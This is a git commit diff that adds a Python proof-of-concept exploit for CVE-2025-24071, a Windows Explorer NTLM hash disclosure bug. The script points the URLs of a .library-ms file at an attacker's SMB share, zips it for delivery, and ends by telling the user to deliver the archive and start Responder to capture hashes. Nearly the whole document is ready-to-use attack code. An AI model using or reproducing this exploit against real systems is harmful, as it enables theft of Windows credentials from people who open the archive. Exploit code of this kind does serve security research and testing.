Adding CVE-2025-24071 and tweaking READMEs

2025-08-19 12:38:44 -06:00
parent 81b198f31c
commit 78bdacd90d
5 changed files with 105 additions and 0 deletions
@@ -0,0 +1,71 @@
+from os import rename
+from os.path import isfile
+from zipfile import ZipFile
+import xml.etree.ElementTree as elementTree
+import argparse
+
+#pretty colors :)
+RESET = "\033[0m"
+RED   = "\033[31m"
+GREEN = "\033[32m"
+YELLOW = "\033[33m"
+BOLD  = "\033[1m"
+
+def findLib(library):
+    if not library.endswith(".library-ms"):
+            library = library + ".library-ms"
+    
+    if isfile(library):
+        pass
+    else:
+        try:
+            rename("mal.library-ms", library)
+        except (OSError, PermissionError, IsADirectoryError) as error:
+            print(f"{BOLD}{RED}[-]{RESET} Error renaming library!")
+            raise SystemExit(error)
+
+    return library
+
+
+def malLib(library, server):
+    contents = elementTree.parse(library)
+    root = contents.getroot()
+    
+    nameSpace = root.tag.split("}")[0].strip("{")
+    elementTree.register_namespace('', nameSpace)
+
+    for element in root.iter():
+        if element.tag.endswith("url"):
+            element.text = "\\\\" + server + "\\shared"
+    contents.write(library, encoding="utf-8", xml_declaration=True)
+
+def mkZip(library, filename):
+    if not filename.endswith(".zip"):
+        filename = filename + ".zip"
+
+    with ZipFile(filename, "w") as malZip:
+        malZip.write(library)
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(prog='CVE-2025-24071.py',
+                                     description='This is a PoC for CVE-2025-24071, a bug in Windows Explorer that allows for NTLM hash disclosure via crafted archives.',
+                                     epilog='PoC by 0xVoodoo - Don\'t be a skid :)' )
+    parser.add_argument('-s', '--server', required=True, help='Target IP/URL')
+    parser.add_argument('-f', '--file', required=True, help='Output file name')
+    parser.add_argument('-l', '--library', help='MS Library file name (default mal.library-ms)')
+    args = parser.parse_args()
+    print("===CVE-2025-24071 PoC by 0xVoodoo===")
+    
+    if args.library:
+        library = findLib(args.library)
+    else:
+        library = "mal.library-ms"
+
+    print(f"{BOLD}{YELLOW}[*]{RESET} Modifying library")
+    malLib(library, args.server)
+
+    print(f"{BOLD}{YELLOW}[*]{RESET} Creating ZIP archive")
+    mkZip(library, args.file)
+
+    print(f"{BOLD}{GREEN}[+]{RESET} ZIP archive created:", args.file)
+    print(f"{BOLD}{YELLOW}[*]{RESET} Deliver the ZIP archive and start responder")